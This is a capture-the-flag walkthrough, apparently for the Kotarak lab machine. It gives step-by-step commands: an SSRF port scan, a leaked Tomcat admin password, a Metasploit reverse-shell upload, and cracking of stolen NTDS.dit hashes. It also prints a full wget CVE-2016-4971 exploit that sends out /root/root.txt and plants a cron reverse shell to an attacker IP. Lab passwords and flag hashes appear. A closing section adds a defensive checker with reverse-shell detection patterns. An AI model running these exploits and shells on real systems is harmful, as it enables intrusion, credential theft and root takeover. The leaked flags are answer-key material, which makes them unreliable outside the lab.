Untitled

a guest
Jan 7th, 2018
http://10.10.10.55:60000/url.php?path=
Put http://localhost:80 in the path parameter.
Take the GET request into Burp and scan ports 1 to 1000 through it.
Reference: http://resources.infosecinstitute.com/the-ssrf-vulnerability/#gref
http://10.10.10.55:60000/url.php?path=http://localhost:888
You will get a backup.
http://10.10.10.55:60000/url.php?path=http://localhost:888?doc=backup
See the source of it:
<user username="admin" password="3@g01PdhB!" roles="manager,manager-gui,admin-gui,manager-script"/>
msfconsole
use exploit/multi/http/tomcat_mgr_upload
set HttpPassword 3@g01PdhB!
set HttpUsername admin
set RHOST 10.10.10.55
set RPORT 8080
set payload linux/x86/shell/reverse_tcp
set LHOST 10.10.15.104
set target 2
run

python -c 'import pty;pty.spawn("/bin/sh")'
cd /home/tomcat/to_archive/pentest_data
You will see:
total 28312
drwxr-xr-x 2 tomcat tomcat 4096 Jul 21 13:13 .
drwxr-xr-x 3 tomcat tomcat 4096 Jul 21 13:13 ..
-rw-r--r-- 1 tomcat tomcat 16793600 Jul 21 12:16 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
-rw-r--r-- 1 tomcat tomcat 12189696 Jul 21 12:16 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
tomcat@kotarak-dmz:/home/tomcat/to_archive/pentest_data$
Download the .dit and .bin files to your PC.
https://implicitdeny.org/2016/05/cracking-domain-passwords-ntds-dit-metasploit-john/
Crack them and you will get the password.


su atanas
f16tomcat!

93f844f50491ef797c9c1b601b4bece8

For root, go to /tmp.
On your PC, go to /tmp and create the file:
nano .wgetrc
post_file = /root/root.txt
output_document = /etc/cron.d/wget-root-shell

https://www.exploit-db.com/exploits/40064/
See this exploit.


nano wget-exploit.py
#!/usr/bin/env python

#
# Wget 1.18 < Arbitrary File Upload Exploit
# Dawid Golunski
# dawid( at )legalhackers.com
#
# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
#
# CVE-2016-4971
#

import SimpleHTTPServer
import SocketServer
import socket

class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_GET(self):
        # This takes care of sending .wgetrc

        print "We have a volunteer requesting " + self.path + " by GET :)\n"
        if "Wget" not in (self.headers.getheader('User-Agent') or ''):
            print "But it's not a Wget :( \n"
            self.send_response(200)
            self.end_headers()
            self.wfile.write("Nothing to see here...")
            return

        print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
        self.send_response(301)
        new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )
        print "Sending redirect to %s \n"%(new_path)
        self.send_header('Location', new_path)
        self.end_headers()

    def do_POST(self):
        # In here we will receive extracted file and install a PoC cronjob

        print "We have a volunteer requesting " + self.path + " by POST :)\n"
        if "Wget" not in (self.headers.getheader('User-Agent') or ''):
            print "But it's not a Wget :( \n"
            self.send_response(200)
            self.end_headers()
            self.wfile.write("Nothing to see here...")
            return

        content_len = int(self.headers.getheader('content-length', 0))
        post_body = self.rfile.read(content_len)
        print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)

        print "Sending back a cronjob script as a thank-you for the file..."
        print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(ROOT_CRON)

        print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"

        return

HTTP_LISTEN_IP = ''
HTTP_LISTEN_PORT = 80
FTP_HOST = '10.10.14.2'
FTP_PORT = 21

ROOT_CRON = "* * * * * root bash -i >& /dev/tcp/10.10.14.2/1234 0>&1"

handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)

print "Ready? Is your FTP server running?"

# Check that the FTP server holding .wgetrc is reachable before serving
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
    print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:
    print "FTP is down :( Exiting."
    exit(1)

print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT

handler.serve_forever()

  134.  
Save it and change the FTP IP to your VPN IP.
Then upload that file to the server in /tmp.
Open a new msfconsole:
use auxiliary/server/ftp
set FTPROOT /tmp
set LHOST your ip
run
Then go to the server and, after you have uploaded the file, run:
authbind python wget-exploit.py


950d1425795dfd38272c93ccbb63ae2c
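A defender-side check for the two artefacts this last step leaves behind, added here as an example (Python 3; not code from the paste or from the exploit author): it parses a .wgetrc for the directives the technique depends on (post_file, output_document) and flags /etc/cron.d entries whose command looks like a reverse shell. The sample inputs are constructed to mirror the .wgetrc and cron line shown above; wget 1.18 and later are not affected, as the exploit header indicates.

```python
#!/usr/bin/env python3
"""Audit the two artefacts of the CVE-2016-4971 technique: a crafted .wgetrc
and a cron.d reverse shell.  Added example; sample inputs are constructed."""
import re

# wgetrc commands that make wget upload a local file or write to a chosen
# path.  wget matches command names case-, dash- and underscore-insensitively,
# so they are kept here in stripped form.
RISKY_WGETRC = {"postfile", "postdata", "outputdocument"}

# Shell idioms typical of a reverse shell planted in a cron job.
SHELL_PATTERNS = [r"/dev/tcp/", r"bash\s+-i", r"\bnc\b.*\s-e\s", r"0>&1"]


def parse_wgetrc(text):
    """Parse 'command = value' lines ('#' starts a comment)."""
    entries = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if "=" not in line:
            continue
        key, value = line.split("=", 1)
        key = re.sub(r"[-_]", "", key.strip().lower())
        entries[key] = value.strip()
    return entries


def audit_wgetrc(text):
    """Return risky (command, value) pairs found in a wgetrc file."""
    found = parse_wgetrc(text)
    return sorted((k, v) for k, v in found.items() if k in RISKY_WGETRC)


def audit_cron_d(text):
    """Return /etc/cron.d lines (5 time fields + user) whose command looks like a reverse shell."""
    hits = []
    for line in text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        parts = line.split(None, 6)  # m h dom mon dow user command
        if len(parts) == 7 and any(re.search(p, parts[6]) for p in SHELL_PATTERNS):
            hits.append(line)
    return hits


if __name__ == "__main__":
    # Constructed samples mirroring the .wgetrc and cron entry in the paste.
    print(audit_wgetrc("post_file = /root/root.txt\noutput_document = /etc/cron.d/wget-root-shell\n"))
    print(audit_cron_d("0 3 * * * root /usr/bin/logrotate /etc/logrotate.conf\n* * * * * root bash -i >& /dev/tcp/10.10.14.2/1234 0>&1\n"))
```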